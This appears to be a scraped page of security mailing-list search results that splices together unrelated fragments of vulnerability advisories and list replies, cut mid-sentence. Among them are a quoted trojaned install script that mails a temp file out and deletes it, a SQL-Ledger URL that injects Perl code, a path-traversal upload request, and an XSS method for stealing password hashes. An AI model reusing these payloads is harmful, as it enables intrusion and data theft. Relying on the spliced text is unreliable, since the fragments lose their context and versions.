-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512
CVE-2017-3162: Apache Hadoop DataNode web UI vulnerability
Severity: Important
Vendor: The Apache Software Foundation
Versions affected: Hadoop 2.6.x and earlier
Description:
HDFS clients interact with a servlet on the DataNode to browse the
HDFS
king source code and control over the server,
this service is just as vulnerable to all the attacks that I
assume your tool is attempting to mitigate.
It's Monday and I haven't had my tea yet, so maybe I'm missing
something. What is it?
--
Chris Nehren
e while we do recommend that users take the issue seriously it
is not one which is expected to be particularly urgent.
Credit:
Chris Travers discovered this issue.
, 2013
Public Disclosure: November XX, 2013
Vulnerability Type: Authentication Bypass Issues [CWE-592]
CVE Reference: CVE-2013-5113, CVE-2013-5114
Issue Severity: Important impact
CVSSv2 Base Score: 6.6 (AV:L/AC:L/AU:N/C:C/I:C/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )
Advisory Details
unsubscribe
On Aug 13, 2013, at 6:37 AM, terry white wrote:
>
> ... ciao:
>
> : on "8-13-2013" "Reindl Harald" writ:
> : >> and so stop trying to be a smartass in topics you are clueless
> : >
> : > Please no personal insults
>
> : truth != insult
>
> it is perhaps just me, but when i see
Kodak has produced a security patch for ICW that removes this vulnerability.
Customers are encouraged to contact their local Response Center to request this
drop-in patch.
Vulnerability Type: Insufficiently Protected Credentials [CWE-522]
CVE Reference: CVE-2013-2503
Risk Level: Medium
CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Discovery: Chris John Riley ( http://blog.c22.cc )
Advisory Details:
During research into browser and proxy server handling of HTTP
Hi all,
Can anyone tell me what risk there is around placing an iCompel device
inside of our network?
There is a web interface but there will be no external access. Are
there any known vulnerabilities that our internal users could exploit?
I am not even sure what OS it is running or if it is hard
invoice number settings can be
overwritten, this problem can run users into regulatory compliance
problems. Users in areas which require gapless numbering of financial
documents need to treat this problem as more severe.
Discovery:
Chris Travers found the problem during work on forthcoming
XSRF
vulnerabilities should probably have their own advisories.
Best Wishes,
Chris Travers
LedgerSMB Core Team
Metatron Technology Consulting
gerSMB prereleases for 1.3 are less vulnerable since audit
trails and other data have permissions enforced per user, thus
ensuring that sql injection issues do not pose the privilege
escalation issues that are present in prior versions. Thus the impact
of an attack like this is greatly limited. The impact on the
pre-releases should be seen as moderate.
Best Wishes,
Chris Travers
45649 for LedgerSMB. I expect to send a
full disclosure email discussing the vulnerability in a week.
Best Wishes,
Chris Travers
ility tests by security vendors.
Thank you for your time,
Chris Travers
LedgerSMB Core Team
terface than you
can very easily insert your own web server in front of it!
--
Chris O'Regan
Senior Unix Systems Administrator, Academic IT Services
Faculty of Engineering and Computer Science
Concordia University, Montreal, Canada
this feature by
default and provide a system variable to enable the behaviour only when
it is desired.
--
Chris O'Regan
Senior Unix Systems Administrator, Academic IT Services
Faculty of Engineering and Computer Science
Concordia University, Montreal, Canada
p-htmlspotter-spotting-asp-net-xss-using-fxcop-and-html-encoding-document.aspx
Best regards,
Chris Weber
-Original Message-
From: Trustwave Advisories [mailto:trustwaveadvisor...@trustwave.com]
Sent: Tuesday, February 09, 2010 2:41 PM
To: webapp...@lists.securityfocus.com; websecur...@web
e
industry moves in that direction.
I do think we need some sort of HTTP status or other header
information that would tell a browser to clear the auth cache and not
try again.
Best Wishes,
Chris Travers
o the proper value should be
determined by each customer. The current default value (3600) which
sets the default value to one hour is way too high though. This issue
will be documented as an issue in future versions of LedgerSMB.
Best Wishes,
Chris Travers
B. However, an incorrect guess as to the request
number deletes the user session and requests a password from the user.
To obtain the hotfix either email me at the address mentioned above or
download the most recent file from svn (branches/1.2):
LedgerSMB/Session/DB.pm.
Sincerely,
Chris Travers
The LedgerSMB Team
ository this code does not appear there.
Best Wishes,
Chris Travers
using LedgerSMB 1.1.x, this is an excellent reason
to upgrade.
I can confirm this problem for the versions mentioned.
Best Wishes,
Chris Travers
The POC link isn't working anymore; chr1x.sectester.net/winrar380_PoC.zip
Could you guys upload it again?
Thank you
the good work!
Chris Schmidt
http://yet-another-dev.blogspot.com
Java Developer and Application Security Analyst
ServiceMagic, Inc.
-Original Message-
From: Inferno [mailto:infe...@securethoughts.com]
Sent: Thursday, August 20, 2009 2:18 AM
To: bugtraq@securityfocus.com
Subject: Bypassing
An early release of 4.0.0 has the same problem!
So Acajoom has a general security issue or the developers were stupid enough to
develop with old code.
ncluding authenticated RSS, XML-formatted AJAX-y responses, and
XHTML.
Full technical details: http://scary.beasts.org/security/CESA-2009-008.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-also-fixes-cross-domain.html
(includes 1-click demo)
Cheers
Chris
evil stylesheet:
irrelevant
Full technical details: http://scary.beasts.org/security/CESA-2009-006.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/06/apples-safari-4-fixes-local-file-theft.html
(includes 1-click demos)
Cheers
Chris
name.
New checks are being planned, and new check ideas or contributions are very
welcome. For example:
Unicode transformation hot-spot detection (planned)
User-controllable javascript events (planned)
Contact me with any questions, bugs, or suggestions.
-Chris Weber
ml
Blog post:
http://scarybeastsecurity.blogspot.com/2009/03/littlecms-vulnerabilities.html
The blog post goes into a little more detail on which attack surfaces
LittleCMS is present, and which system-level defenses mitigate this
vulnerability.
Cheers
Chris
2-bit syscall and vice versa. The syscall "number"
check can get confused and permit a syscall it did not intend to.
Advisory: http://scary.beasts.org/security/CESA-2009-001.html
Blog post:
http://scarybeastsecurity.blogspot.com/2009/01/bypassing-syscall-filtering.html
Cheers
Chris
Hi,
Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data.
The theft is via cross-domain information leaks in JavaScript error
messages for scripts executed via
http://scarybeastsecurity.blogspot.com/2008/11/firefox-cross-domain-image-theft-and.html
Cheers
Chris
Severity: Medium (Local Privilege Escalation)
Authors: Chris Clark
Rachel Engel
Vendor notified: Yes
Public release: 10/10/08
Advisory URL: https://www.isecpartners.com/advisories/2008-02-lenovornr.txt
Summary:
Lenovo Rescue and Recovery monitors system changes and enables
unlimited data in POST operations
to any screen. Authentication is not required and this can be used to
deny service not only to LedgerSMB but potentially to anything else
running on the server. This was corrected in 1.2.15.
Credit for discovery:
Chris Murtagh
Vulnerability 2: SQL Injection in AR/AP
tp://exslt.org/math";
extension-element-prefixes="str crypto math">
blah
Blog post for this, and future issues (with RSS):
http://scarybeastsecurity.blogspot.com/2008/07/buffer-overflow-in-libxslt.html
http://scarybeastsecurity.blogspot.com/
Cheers
Chris
or /en/administrator.html) and turn off all the aircon in the
data centre...
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
so I think it's fair game to expect them to implement
some kind of real security.
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
2008-03-17: Patches applied to public servers.
2008-03-24: Public disclosure.
--
Chris Porter (slug on QuakeNet)
http://www.warp13.co.uk
bishi Electric find a clue stick to
hit themselves with!
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
"""
usage: python pwnz.py 192.168.1.x [on|off]
"""
# you can get BeautifulSoup from:
# http
l of the above:
http://scarybeastsecurity.blogspot.com/2008/03/sun-jdk-image-parsing-vulnerabilities.html
Cheers
Chris
scary.beasts.org/security/CESA-2008-001.html
Cheers
Chris
-side
XML accepting technologies) deployed under JDK6. I haven't had time to
look into common web service frameworks and see how they implement XXE
protection. Might be interesting to look into specific technologies
that broke.
Cheers
Chris
RubyGnome2 0.16.0
Format String Vulnerability In Gtk::MessageDialog
http://em386.blogspot.com
Ruby Gnome2 is a project to provide GTK2 bindings to ruby scripts so you can
write GUI code in less time. There is a format string vulnerability in
Gtk::MessageDialog(). This design flaw does not
al
e at Mitsubishi that
can actually do anything about this?
cheers,
Chris
--
Simplistix - Content Management, Zope & Python Consulting
- http://www.simplistix.co.uk
2>/dev/null
mail [EMAIL PROTECTED] < /tmp/.bx
sleep 4
rm -rf /tmp/.bx
What's up with this? Last time I downloaded this that wasn't there,
and it's the same version number but different md5.
.. and this file wasn't included.
Chris
Network security professional
[EMAIL PR
injection
issues in that application. Our official recommendation for
SQL-Ledger users is to restrict access to database relations to the
least privilege necessary. While this does not entirely solve the
issues, it does limit the damage considerably.
Best Wishes,
Chris Travers
Affected: All Ruby Platforms
Severity: Medium - Compromise of SSL connection integrity
Author: Chris Clark
Vendor notified: Yes
Public release: Yes
Advisory URL: http://www.isecpartners.com/advisories/2007-006-rubyssl.txt
Summary:
The Ruby Net::HTTP and Net::HTTPS library can be used to make
Streamripper 1.62.1 Security Advisory | http://streamripper.sf.net
Multiple Buffer Overflows
12 August 2007
Chris Rohlf
http://em386.blogspot.com
---
Description
---
Streamripper is a program used to rip streaming media to mp3 format to
your harddrive.
Multiple buffer
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello,
Bigby Findrake wrote:
> On Wed, 18 Jul 2007, Chris Stromblad wrote:
>
>
>
>> One more thing about "advisories". I think it would be better to release
>> them immediately and let people know what they are fa
demanding more secure software...
We can speculate back and forth about the impact of "real" public
disclosure without getting anywhere. What we can do however is look at
the past and what works there. Take education for example. Would you
argue that it's better with an educate
ayout
and contents. Also to improve the educational value of an advisory it
would be neat if an appropriate code-segment of the vulnerability could
be included. Now people will argue the whole intellectual property
aspect but I seriously doubt that 3-5 lines of code are going to affect
anything.
acture security products or are responsible for the security of
their networks. All questions regarding more information on this
vulnerability can be directed to Chris Travers ( [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]> or [EMAIL PROTECTED]
<mailto:[EMAIL PROTECTED]>).
embezzlement) appear to be tied to any
other legitimate user.
This is the most important security vulnerability since 1.1.5 and all
users are advised to upgrade immediately.
Best Wishes,
Chris Travers
't help anyone. If anything it prevents people from
trying to find a way to fix the vulnerability.
Michael Zalewski is in my opinion someone who is using the bug-traq list
in a way that is meaningful. He brings up topics for discussion that
concern us all. More people should do that.
Anyways
(CCS)
http://www.auto.tuwien.ac.at/~chris/worm07.html
=
Important Dates:
Submission deadline: 24 June, 2007 (23:59 PST)
Acceptance Notification: 07 August, 2007
Camera-ready papers: 22 August, 2007
The address for
this is easy to find and is:
[EMAIL PROTECTED]
Please do your research next time, and if you actually find a
security problem, let us know so that we can release a patch for it
and credit you on our website with the release announcement. thanks!
-Chris
Gallery Project
inadequate for security purposes and that roles need to be isolated into
separate database accounts (which the application does support).
However, this process is cumbersome. The LedgerSMB project intends to
automate this process properly in 1.3.0 (perhaps six months away).
Best Wishes,
C
,
Chris Travers
sers/members
This works because there is usually a Perl script named sql-ledger.conf
in the directory above where these scripts are normally stored. So the
username forces the execution of that script, doesn't find a password,
and so allows the user in. Lovely
Best Wishes,
Chris
can upgrade to 2.6.26 should do so, and LedgerSMB 1.1 or 1.0 users
should upgrade to 1.1.9. Users who cannot upgrade should configure
their web servers to use http authentication for the admin.pl script in
the main root directory.
Best Wishes,
Chris Travers
s are advised to upgrade to the latest version, and
all LedgerSMB users using versions prior to 1.1.5 should upgrade as well.
Best Wishes,
Chris Travers
scripts are run at every
page load, are created on login, and destroyed at logout. Using the
same method, you can add arbitrary Perl code to the end of these files
causing that to be loaded the next time the target user loads a page.
Best Wishes,
Chris Travers
ity
-
This has been fixed for at least a year.
--
Best Regards,
Chris Smith
PHP Product Manager
Interspire - The World's Best Selling Webware
http://www.interspire.com
Amit Klein wrote:
> Chris Anley wrote:
>> Hi folks,
>> I've posted a paper that explains a little more here:
>> http://www.ngssoftware.com/research/papers/Randomness.pdf
>
>
> Nice paper. I do notice an enumeration loop over 2^16 possible 16-bit
> values. T
.
Best Wishes,
Chris Travers
diff -C3 -r sql-ledger-orig/SL/Form.pm sql-ledger/SL/Form.pm
*** sql-ledger-orig/SL/Form.pm 2007-02-05 18:20:34.0 -0800
--- sql-ledger/SL/Form.pm 2007-02-05 18:23:06.0 -0800
***
*** 311,318
if ($self->{callback}) {
!
g LCGs but also more advanced generators such as
the Mersenne twister and SHA1PRNG.
Cheers,
-chris.
is still not corrected in SQL-Ledger.
There is no workaround to prevent the problem except to hope that those
who are using vulnerable software can be trusted.
I will be sending a full disclosure of the problem, as well as an
unofficial patch to SQL-Ledger in a week.
Best Wishes,
Chris
://127.0.0.1/sql-ledger/login.pl?login=demo&script=-e%3fprint%20STDERR%20%27hello%20world%27%3b&action=logout
<http://127.0.0.1/sql-ledger/login.pl?login=demo&script=-e%3fprint%20STDERR%20%27hello%20world%27%3b&action=logout>
Best Wishes,
Chris Travers
Metatron Technology
nt development, current 1.6-alpha3 and future release
candidates)
http://gallery.svn.sourceforge.net/viewvc/gallery/trunk/gallery/
contrib/phpBB2/modules.php?view=markup
-Chris
Gallery Project Manager
--
Chris Kelly
[EMAIL PROTECTED]
http://ckdake.com
Researchers and vendor contacts should also be aware of the great vendor
dictionary created by OSVDB at http://osvdb.org/vendor_dict.php that
contains many security contact addresses.
-Chris
On Mon, 8 Jan 2007, Steven M. Christey wrote:
>
> We frequently see requests for contact o
at the package in question had a
vulnerability, and that it has been fixed in Gentoo. It isn't meant as
a generic disclosure or advisory.
Sorry if there was any confusion.
--
Chris Gianelloni
Release Engineering Strategic Lead
Alpha/AMD64/x86 Architecture Teams
Games Developer/Council Member
Last night HD Moore released an exploit module for Metasploit
Framework 3 that exploits a fully patched Windows XP SP2 system, which
includes remote code execution. Previously this was announced on the
Browser Fun blog as a DoS only exploit.
More information at:
http://riosec.com/msie-setslice-v
his software.
All customers should upgrade to the newest versions of these packages at
their earliest convenience.
Credit for this disclosure should go to Chris Murtagh (a private
individual) and Richard Patterson of Quickhelp.
Best Wishes,
Chris Travers
Metatron Technology Consulting
Hi all;
I have received many requests from security professions responsible for the
security of Linux distros to move the full disclosure ahead. Now that I am
reasonably sure that the full scope of the problem is known and fixed in
the fix that Chris Murtagh and myself put together, it has been
applications, and enforce permissions
accordingly. The different installations can access the same database, however.
Full disclosure will follow two weeks from yesterday.
Best Wishes,
Chris Travers
Metatron Technology Consulting
uired or change course. Symantec should post its full advisories to
the list and so should everyone else.
-Chris
1. Bugtraq: Administrivia & AOL IM Advisory,
http://seclists.org/bugtraq/2000/Dec/0197.html
-
PatchLink Update Server 6 SQL Injection
-
Severity: Critical
Date: June 28, 2006
Class: Remote
Status: Patch Available
Discovered by: Chris Steipp, Novacoast (csteipp at
a proof of concept :P...
thnx
tested on win xp pro service pack 1..
http://www.flock.com/
flox web browser remote dos exploit by n00b ::
http://www.flock.com/ ::..
Credit's to n00b..Round {2} of the marquee bug's...
Multiple XSS Vulnerabilities exist in vbulletin.com's website that allow the
attacker to gain sensitive credentials for authentication himself as a user on
the forum and site.
The first problem lies in the site's Sales Form for opening an issue
ticket. Proper sanitation of variables passe
UBBThreads 5.x,6.x md5 hash disclosure
---
Using XSS such as the one reported earlier:
http://[site]/[ubbpath]/index.php?debug=[xss]
will allow you to inject javascript and steal MD5 Hashes from:
http://[site]/[ubbpath]/editbasic.php
The MD5 is auto
s, the scans results were inconsistent. Both SYN and ACK
> scans had similar issues.
IMHO this is a feature. I would certainly rather see a port scanner
receiving bogus results rather than accurate info that would assist in a
compromise. Make them work a bit harder and earn it. ;-)
HTH,
Chris
>
> Saluti da P4
- --
Chris Horry KG4TSM "A conservative is a m
There is no such bug and even if I'm wrong, there's already version 4.1.3!
---
Software:
Firefox Web Browser
Tested:
Linux, Windows clients' version 1.5.0.2
Result:
Firefox Remote Code Execution and Denial of Service - Vendor contacted, no
patch yet.
Problem:
A handling issue exists in how Firefox handles certain J
members of Gentoo's games team, so I'm a pretty
good resource on this.
(Posting from my home address since my Gentoo one isn't registered with
the list)
--
Chris Gianelloni
Release Engineering - Strategic Lead
x86 Architecture Team
Games - Developer
Gentoo Linux
l sections in the reply) and then use the authoritative
nameservers for that RRset, not any old open recursive nameserver
(or many of them). You cannot craft your own RRset for the purpose.
But you can still get amplification, certainly.
--
Chris Thompson
Email: [EMAIL PROTECTED]
and my manpages for rmdir(1) [the utility] and rmdir(2) [the system
call] both say that the directory must be empty (ie, have no entries
other than "." or "..").
rmdir(2) should fail and errno should be set to ENOTEMPTY if the
directory is not empty.
On 3/14/06, Steven M. Christey <[EMAIL PROTECT
The default on 1.5.2, 2.0 and 2.0.1 is to automatically approve comments
without moderation IF the following are true:
- The comment author has filled out name and e-mail (trivial)
- The comment author must have a previously approved comment (not so trivial)
This means the first comment must
le
types with this option in place.
-Chris
02 August 2003
Hardware: D-Link 704p
Vulnerability: Multiple Local/Remote (see below)
Warning Level: Moderate
Description:
This small advisory is on the D-Link 704p router with firmware version
2.70. The router is a small 4 port DSL/CABLE router. Earlier this year I
made a small post on BUGT
That's not really allowing another program to bind the keys. In the case of
the Netware client, Microsoft's GINA is completely replaced by the NWGINA
which handles the authentication at that point. It doesn't simply bypass
MS's GINA unless I'm incredibly misinformed. A malicious user can certain
rol??
Safe for Scripting indicates that a control does not access files, memory,
or registers directly. The only purpose of the Windows Update control is to
access (and update) files directly, so it should not be marked as safe for
scripting.
--
Chris Jackson
Software Engineer
Microsoft MVP
--
f spurring more research into the problem,
increasing the average developers understanding of the problem, and preventing
the attacks as far as is possible.
Chris Paget
On Fri, 11 Jul 2003, iDEFENSE Labs wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> iDEFENSE Security Advis
bit on the bad CLSID before they are attacked. Perhaps Microsoft should
allow other vendors to send them CLSIDs to kill. Or maybe they already do
allow this but it is not publicized.
-Chris
> Sincerely,
>
> Jason Coombs
> [EMAIL PROTECTED]
guration page does not respond until you reset the router.
-->
i sent an email to dlink containing a copy of this post. Thanx
-->
--chris
www.securityindex.net
-apex security group-
oundary#1234567890#
Content-Disposition: form-data; name="Haxor"; filename="../../../tmp/haxor.html"
Haxor
This page should not be here
--#123456789#multipart#boundary#1234567890#--
=request end
Best Regards,
Chris Leishman
On 7/1/03 2:58 am, Floyd Russell <[EMAIL PROTECTED]> wrote:
> Negative on Windows 98 SE
No problems with Mac OS X 10.2.3, which also contains an OpenType engine.
Cheers,
Chris
64. We either run BIND 8 or don't run BIND (and despite the work
involved in switching, running something other than BIND is looking
good).
--
Chris Adams <[EMAIL PROTECTED]>
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.
preferences.
So yes the "exploit" works, but you might be letting
know your "victim" that you're after him.
Chris
== Original Message ==
Exploit:
When you try to access another user's shared files,
you will get a pop-up with a message that either reads
"Askin
]
-Chris
On Tue, 5 Nov 2002, Steven M. Christey wrote:
>
> On the full-disclosure list, low halo asked:
>
> >Could someone please give me the security contact address for Oracle
> >Corporation? It seems as though their marketing department's
> >"Unbreakable&qu
code more carefully that
there are a few more parts in it which need to be rewritten. So if you
run a KDC, please protect it carefully! There will probably be new releases of
Heimdal out in a week or so.
Please upgrade your systems ASAP because this is a really serious problem!
--Chris
--
1 - 100 of 195 matches